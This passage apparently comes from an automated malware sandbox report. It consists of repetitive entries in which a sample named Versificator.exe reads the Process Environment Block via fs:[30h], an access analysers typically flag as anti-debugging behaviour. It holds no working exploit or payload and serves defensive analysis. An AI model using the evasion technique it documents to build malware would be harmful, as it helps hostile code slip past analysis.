            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: 11_2_212DA118 mov eax, dword ptr fs:[00000030h]11_2_212DA118
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: 11_2_212DA118 mov eax, dword ptr fs:[00000030h]11_2_212DA118
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: 11_2_212DA118 mov eax, dword ptr fs:[00000030h]11_2_212DA118
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: 11_2_212F0115 mov eax, dword ptr fs:[00000030h]11_2_212F0115
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: 11_2_21304164 mov eax, dword ptr fs:[00000030h]11_2_21304164
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: 11_2_21304164 mov eax, dword ptr fs:[00000030h]11_2_21304164
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: 11_2_212C4144 mov eax, dword ptr fs:[00000030h]11_2_212C4144
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: 11_2_212C4144 mov eax, dword ptr fs:[00000030h]11_2_212C4144
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: 11_2_212C4144 mov ecx, dword ptr fs:[00000030h]11_2_212C4144
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: 11_2_212C4144 mov eax, dword ptr fs:[00000030h]11_2_212C4144
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: 11_2_212C4144 mov eax, dword ptr fs:[00000030h]11_2_212C4144
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: 11_2_2122C156 mov eax, dword ptr fs:[00000030h]11_2_2122C156
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: 11_2_212C8158 mov eax, dword ptr fs:[00000030h]11_2_212C8158
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: 11_2_21236154 mov eax, dword ptr fs:[00000030h]11_2_21236154
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: 11_2_21236154 mov eax, dword ptr fs:[00000030h]11_2_21236154
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: 11_2_21270185 mov eax, dword ptr fs:[00000030h]11_2_21270185
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: 11_2_212EC188 mov eax, dword ptr fs:[00000030h]11_2_212EC188
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: 11_2_212EC188 mov eax, dword ptr fs:[00000030h]11_2_212EC188
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: 11_2_212D4180 mov eax, dword ptr fs:[00000030h]11_2_212D4180
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: 11_2_212D4180 mov eax, dword ptr fs:[00000030h]11_2_212D4180
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: 11_2_212B019F mov eax, dword ptr fs:[00000030h]11_2_212B019F
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: 11_2_212B019F mov eax, dword ptr fs:[00000030h]11_2_212B019F
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: 11_2_212B019F mov eax, dword ptr fs:[00000030h]11_2_212B019F
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: 11_2_212B019F mov eax, dword ptr fs:[00000030h]11_2_212B019F
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: 11_2_2122A197 mov eax, dword ptr fs:[00000030h]11_2_2122A197
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: 11_2_2122A197 mov eax, dword ptr fs:[00000030h]11_2_2122A197
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: 11_2_2122A197 mov eax, dword ptr fs:[00000030h]11_2_2122A197
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: 11_2_213061E5 mov eax, dword ptr fs:[00000030h]11_2_213061E5
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: 11_2_212601F8 mov eax, dword ptr fs:[00000030h]11_2_212601F8
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: 11_2_212F61C3 mov eax, dword ptr fs:[00000030h]11_2_212F61C3
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: 11_2_212F61C3 mov eax, dword ptr fs:[00000030h]11_2_212F61C3
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: 11_2_212AE1D0 mov eax, dword ptr fs:[00000030h]11_2_212AE1D0
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: 11_2_212AE1D0 mov eax, dword ptr fs:[00000030h]11_2_212AE1D0
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: 11_2_212AE1D0 mov ecx, dword ptr fs:[00000030h]11_2_212AE1D0
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: 11_2_212AE1D0 mov eax, dword ptr fs:[00000030h]11_2_212AE1D0
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: 11_2_212AE1D0 mov eax, dword ptr fs:[00000030h]11_2_212AE1D0
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: 11_2_2122A020 mov eax, dword ptr fs:[00000030h]11_2_2122A020
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: 11_2_2122C020 mov eax, dword ptr fs:[00000030h]11_2_2122C020
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: 11_2_212C6030 mov eax, dword ptr fs:[00000030h]11_2_212C6030
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: 11_2_212B4000 mov ecx, dword ptr fs:[00000030h]11_2_212B4000
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: 11_2_212D2000 mov eax, dword ptr fs:[00000030h]11_2_212D2000
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: 11_2_212D2000 mov eax, dword ptr fs:[00000030h]11_2_212D2000
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: 11_2_212D2000 mov eax, dword ptr fs:[00000030h]11_2_212D2000
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: 11_2_212D2000 mov eax, dword ptr fs:[00000030h]11_2_212D2000
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: 11_2_212D2000 mov eax, dword ptr fs:[00000030h]11_2_212D2000
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: 11_2_212D2000 mov eax, dword ptr fs:[00000030h]11_2_212D2000
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: 11_2_212D2000 mov eax, dword ptr fs:[00000030h]11_2_212D2000
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: 11_2_212D2000 mov eax, dword ptr fs:[00000030h]11_2_212D2000
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: 11_2_2124E016 mov eax, dword ptr fs:[00000030h]11_2_2124E016
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: 11_2_2124E016 mov eax, dword ptr fs:[00000030h]11_2_2124E016
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: 11_2_2124E016 mov eax, dword ptr fs:[00000030h]11_2_2124E016
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: 11_2_2124E016 mov eax, dword ptr fs:[00000030h]11_2_2124E016
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: 11_2_2125C073 mov eax, dword ptr fs:[00000030h]11_2_2125C073
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: 11_2_21232050 mov eax, dword ptr fs:[00000030h]11_2_21232050
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: 11_2_212B6050 mov eax, dword ptr fs:[00000030h]11_2_212B6050
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: 11_2_212280A0 mov eax, dword ptr fs:[00000030h]11_2_212280A0
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: 11_2_212C80A8 mov eax, dword ptr fs:[00000030h]11_2_212C80A8
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: 11_2_212F60B8 mov eax, dword ptr fs:[00000030h]11_2_212F60B8
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: 11_2_212F60B8 mov ecx, dword ptr fs:[00000030h]11_2_212F60B8
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: 11_2_2123208A mov eax, dword ptr fs:[00000030h]11_2_2123208A
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: 11_2_2122A0E3 mov ecx, dword ptr fs:[00000030h]11_2_2122A0E3
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: 11_2_212380E9 mov eax, dword ptr fs:[00000030h]11_2_212380E9
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: 11_2_212B60E0 mov eax, dword ptr fs:[00000030h]11_2_212B60E0
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: 11_2_2122C0F0 mov eax, dword ptr fs:[00000030h]11_2_2122C0F0
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: 11_2_212720F0 mov ecx, dword ptr fs:[00000030h]11_2_212720F0
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: 11_2_212B20DE mov eax, dword ptr fs:[00000030h]11_2_212B20DE
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: 11_2_2126A30B mov eax, dword ptr fs:[00000030h]11_2_2126A30B
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: 11_2_2126A30B mov eax, dword ptr fs:[00000030h]11_2_2126A30B
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: 11_2_2126A30B mov eax, dword ptr fs:[00000030h]11_2_2126A30B
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: 11_2_2122C310 mov ecx, dword ptr fs:[00000030h]11_2_2122C310
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: 11_2_21250310 mov ecx, dword ptr fs:[00000030h]11_2_21250310
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: 11_2_212D437C mov eax, dword ptr fs:[00000030h]11_2_212D437C
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: 11_2_212B2349 mov eax, dword ptr fs:[00000030h]11_2_212B2349
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: 11_2_212B2349 mov eax, dword ptr fs:[00000030h]11_2_212B2349
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: 11_2_212B2349 mov eax, dword ptr fs:[00000030h]11_2_212B2349
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: 11_2_212B2349 mov eax, dword ptr fs:[00000030h]11_2_212B2349
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: 11_2_212B2349 mov eax, dword ptr fs:[00000030h]11_2_212B2349
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: 11_2_212B2349 mov eax, dword ptr fs:[00000030h]11_2_212B2349
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: 11_2_212B2349 mov eax, dword ptr fs:[00000030h]11_2_212B2349
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: 11_2_212B2349 mov eax, dword ptr fs:[00000030h]11_2_212B2349
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: 11_2_212B2349 mov eax, dword ptr fs:[00000030h]11_2_212B2349
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: 11_2_212B2349 mov eax, dword ptr fs:[00000030h]11_2_212B2349
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: 11_2_212B2349 mov eax, dword ptr fs:[00000030h]11_2_212B2349
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: 11_2_212B2349 mov eax, dword ptr fs:[00000030h]11_2_212B2349
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: 11_2_212B2349 mov eax, dword ptr fs:[00000030h]11_2_212B2349
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: 11_2_212B2349 mov eax, dword ptr fs:[00000030h]11_2_212B2349
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: 11_2_212B2349 mov eax, dword ptr fs:[00000030h]11_2_212B2349
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: 11_2_212B035C mov eax, dword ptr fs:[00000030h]11_2_212B035C
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: 11_2_212B035C mov eax, dword ptr fs:[00000030h]11_2_212B035C
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: 11_2_212B035C mov eax, dword ptr fs:[00000030h]11_2_212B035C
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: 11_2_212B035C mov ecx, dword ptr fs:[00000030h]11_2_212B035C
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: 11_2_212B035C mov eax, dword ptr fs:[00000030h]11_2_212B035C
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: 11_2_212B035C mov eax, dword ptr fs:[00000030h]11_2_212B035C
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: 11_2_212FA352 mov eax, dword ptr fs:[00000030h]11_2_212FA352
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: 11_2_212D8350 mov ecx, dword ptr fs:[00000030h]11_2_212D8350
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: 11_2_2130634F mov eax, dword ptr fs:[00000030h]11_2_2130634F
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: 11_2_2122E388 mov eax, dword ptr fs:[00000030h]11_2_2122E388
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: 11_2_2122E388 mov eax, dword ptr fs:[00000030h]11_2_2122E388
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: 11_2_2122E388 mov eax, dword ptr fs:[00000030h]11_2_2122E388
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: 11_2_2125438F mov eax, dword ptr fs:[00000030h]11_2_2125438F
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: 11_2_2125438F mov eax, dword ptr fs:[00000030h]11_2_2125438F
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: 11_2_21228397 mov eax, dword ptr fs:[00000030h]11_2_21228397
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: 11_2_21228397 mov eax, dword ptr fs:[00000030h]11_2_21228397
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: 11_2_21228397 mov eax, dword ptr fs:[00000030h]11_2_21228397
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: 11_2_212403E9 mov eax, dword ptr fs:[00000030h]11_2_212403E9
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: 11_2_212403E9 mov eax, dword ptr fs:[00000030h]11_2_212403E9
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: 11_2_212403E9 mov eax, dword ptr fs:[00000030h]11_2_212403E9
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: 11_2_212403E9 mov eax, dword ptr fs:[00000030h]11_2_212403E9
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: 11_2_212403E9 mov eax, dword ptr fs:[00000030h]11_2_212403E9
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: 11_2_212403E9 mov eax, dword ptr fs:[00000030h]11_2_212403E9
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: 11_2_212403E9 mov eax, dword ptr fs:[00000030h]11_2_212403E9
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: 11_2_212403E9 mov eax, dword ptr fs:[00000030h]11_2_212403E9
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: 11_2_2124E3F0 mov eax, dword ptr fs:[00000030h]11_2_2124E3F0
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: 11_2_2124E3F0 mov eax, dword ptr fs:[00000030h]11_2_2124E3F0
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: 11_2_2124E3F0 mov eax, dword ptr fs:[00000030h]11_2_2124E3F0
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: 11_2_212663FF mov eax, dword ptr fs:[00000030h]11_2_212663FF
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: 11_2_212EC3CD mov eax, dword ptr fs:[00000030h]11_2_212EC3CD
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: 11_2_2123A3C0 mov eax, dword ptr fs:[00000030h]11_2_2123A3C0
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: 11_2_2123A3C0 mov eax, dword ptr fs:[00000030h]11_2_2123A3C0
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: 11_2_2123A3C0 mov eax, dword ptr fs:[00000030h]11_2_2123A3C0
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: 11_2_2123A3C0 mov eax, dword ptr fs:[00000030h]11_2_2123A3C0
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: 11_2_2123A3C0 mov eax, dword ptr fs:[00000030h]11_2_2123A3C0
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: 11_2_2123A3C0 mov eax, dword ptr fs:[00000030h]11_2_2123A3C0
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: 11_2_212383C0 mov eax, dword ptr fs:[00000030h]11_2_212383C0
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: 11_2_212383C0 mov eax, dword ptr fs:[00000030h]11_2_212383C0
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: 11_2_212383C0 mov eax, dword ptr fs:[00000030h]11_2_212383C0
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: 11_2_212383C0 mov eax, dword ptr fs:[00000030h]11_2_212383C0
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: 11_2_212B63C0 mov eax, dword ptr fs:[00000030h]11_2_212B63C0
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: 11_2_212DE3DB mov eax, dword ptr fs:[00000030h]11_2_212DE3DB
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: 11_2_212DE3DB mov eax, dword ptr fs:[00000030h]11_2_212DE3DB
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: 11_2_212DE3DB mov ecx, dword ptr fs:[00000030h]11_2_212DE3DB
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: 11_2_212DE3DB mov eax, dword ptr fs:[00000030h]11_2_212DE3DB
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: 11_2_212D43D4 mov eax, dword ptr fs:[00000030h]11_2_212D43D4
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: 11_2_212D43D4 mov eax, dword ptr fs:[00000030h]11_2_212D43D4
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: 11_2_2122823B mov eax, dword ptr fs:[00000030h]11_2_2122823B
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: 11_2_21234260 mov eax, dword ptr fs:[00000030h]11_2_21234260
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: 11_2_21234260 mov eax, dword ptr fs:[00000030h]11_2_21234260
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: 11_2_21234260 mov eax, dword ptr fs:[00000030h]11_2_21234260
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: 11_2_2122826B mov eax, dword ptr fs:[00000030h]11_2_2122826B
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: 11_2_212E0274 mov eax, dword ptr fs:[00000030h]11_2_212E0274
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: 11_2_212E0274 mov eax, dword ptr fs:[00000030h]11_2_212E0274
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: 11_2_212E0274 mov eax, dword ptr fs:[00000030h]11_2_212E0274
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: 11_2_212E0274 mov eax, dword ptr fs:[00000030h]11_2_212E0274
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: 11_2_212E0274 mov eax, dword ptr fs:[00000030h]11_2_212E0274
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: 11_2_212E0274 mov eax, dword ptr fs:[00000030h]11_2_212E0274
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: 11_2_212E0274 mov eax, dword ptr fs:[00000030h]11_2_212E0274
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: 11_2_212E0274 mov eax, dword ptr fs:[00000030h]11_2_212E0274
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: 11_2_212E0274 mov eax, dword ptr fs:[00000030h]11_2_212E0274
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: 11_2_212E0274 mov eax, dword ptr fs:[00000030h]11_2_212E0274
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: 11_2_212E0274 mov eax, dword ptr fs:[00000030h]11_2_212E0274
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: 11_2_212E0274 mov eax, dword ptr fs:[00000030h]11_2_212E0274
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: 11_2_212B8243 mov eax, dword ptr fs:[00000030h]11_2_212B8243
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: 11_2_212B8243 mov ecx, dword ptr fs:[00000030h]11_2_212B8243
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: 11_2_2130625D mov eax, dword ptr fs:[00000030h]11_2_2130625D
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: 11_2_2122A250 mov eax, dword ptr fs:[00000030h]11_2_2122A250
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: 11_2_21236259 mov eax, dword ptr fs:[00000030h]11_2_21236259
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: 11_2_212EA250 mov eax, dword ptr fs:[00000030h]11_2_212EA250
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: 11_2_212EA250 mov eax, dword ptr fs:[00000030h]11_2_212EA250
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: 11_2_212402A0 mov eax, dword ptr fs:[00000030h]11_2_212402A0
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: 11_2_212402A0 mov eax, dword ptr fs:[00000030h]11_2_212402A0
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: 11_2_212C62A0 mov eax, dword ptr fs:[00000030h]11_2_212C62A0
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: 11_2_212C62A0 mov ecx, dword ptr fs:[00000030h]11_2_212C62A0
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: 11_2_212C62A0 mov eax, dword ptr fs:[00000030h]11_2_212C62A0
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: 11_2_212C62A0 mov eax, dword ptr fs:[00000030h]11_2_212C62A0
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: 11_2_212C62A0 mov eax, dword ptr fs:[00000030h]11_2_212C62A0
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: 11_2_212C62A0 mov eax, dword ptr fs:[00000030h]11_2_212C62A0
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: 11_2_2126E284 mov eax, dword ptr fs:[00000030h]11_2_2126E284
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: 11_2_2126E284 mov eax, dword ptr fs:[00000030h]11_2_2126E284
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: 11_2_212B0283 mov eax, dword ptr fs:[00000030h]11_2_212B0283
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: 11_2_212B0283 mov eax, dword ptr fs:[00000030h]11_2_212B0283
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: 11_2_212B0283 mov eax, dword ptr fs:[00000030h]11_2_212B0283
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: 11_2_212402E1 mov eax, dword ptr fs:[00000030h]11_2_212402E1
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: 11_2_212402E1 mov eax, dword ptr fs:[00000030h]11_2_212402E1
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: 11_2_212402E1 mov eax, dword ptr fs:[00000030h]11_2_212402E1
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: 11_2_213062D6 mov eax, dword ptr fs:[00000030h]11_2_213062D6
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: 11_2_21240535 mov eax, dword ptr fs:[00000030h]11_2_21240535
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: 11_2_21240535 mov eax, dword ptr fs:[00000030h]11_2_21240535
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: 11_2_21240535 mov eax, dword ptr fs:[00000030h]11_2_21240535
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: 11_2_21240535 mov eax, dword ptr fs:[00000030h]11_2_21240535
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: 11_2_21240535 mov eax, dword ptr fs:[00000030h]11_2_21240535
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: 11_2_21240535 mov eax, dword ptr fs:[00000030h]11_2_21240535
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: 11_2_2125E53E mov eax, dword ptr fs:[00000030h]11_2_2125E53E
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: 11_2_2125E53E mov eax, dword ptr fs:[00000030h]11_2_2125E53E
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: 11_2_2125E53E mov eax, dword ptr fs:[00000030h]11_2_2125E53E
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: 11_2_2125E53E mov eax, dword ptr fs:[00000030h]11_2_2125E53E
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: 11_2_2125E53E mov eax, dword ptr fs:[00000030h]11_2_2125E53E
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: 11_2_212C6500 mov eax, dword ptr fs:[00000030h]11_2_212C6500
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: 11_2_21304500 mov eax, dword ptr fs:[00000030h]11_2_21304500
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: 11_2_21304500 mov eax, dword ptr fs:[00000030h]11_2_21304500
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: 11_2_21304500 mov eax, dword ptr fs:[00000030h]11_2_21304500
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: 11_2_21304500 mov eax, dword ptr fs:[00000030h]11_2_21304500
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: 11_2_21304500 mov eax, dword ptr fs:[00000030h]11_2_21304500
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: 11_2_21304500 mov eax, dword ptr fs:[00000030h]11_2_21304500
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: 11_2_21304500 mov eax, dword ptr fs:[00000030h]11_2_21304500
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: 11_2_2126656A mov eax, dword ptr fs:[00000030h]11_2_2126656A
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: 11_2_2126656A mov eax, dword ptr fs:[00000030h]11_2_2126656A
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: 11_2_2126656A mov eax, dword ptr fs:[00000030h]11_2_2126656A
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: 11_2_21238550 mov eax, dword ptr fs:[00000030h]11_2_21238550
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: 11_2_21238550 mov eax, dword ptr fs:[00000030h]11_2_21238550
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: 11_2_212B05A7 mov eax, dword ptr fs:[00000030h]11_2_212B05A7
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: 11_2_212B05A7 mov eax, dword ptr fs:[00000030h]11_2_212B05A7
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: 11_2_212B05A7 mov eax, dword ptr fs:[00000030h]11_2_212B05A7
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: 11_2_212545B1 mov eax, dword ptr fs:[00000030h]11_2_212545B1
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: 11_2_212545B1 mov eax, dword ptr fs:[00000030h]11_2_212545B1
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: 11_2_21232582 mov eax, dword ptr fs:[00000030h]11_2_21232582
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: 11_2_21232582 mov ecx, dword ptr fs:[00000030h]11_2_21232582
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: 11_2_21264588 mov eax, dword ptr fs:[00000030h]11_2_21264588
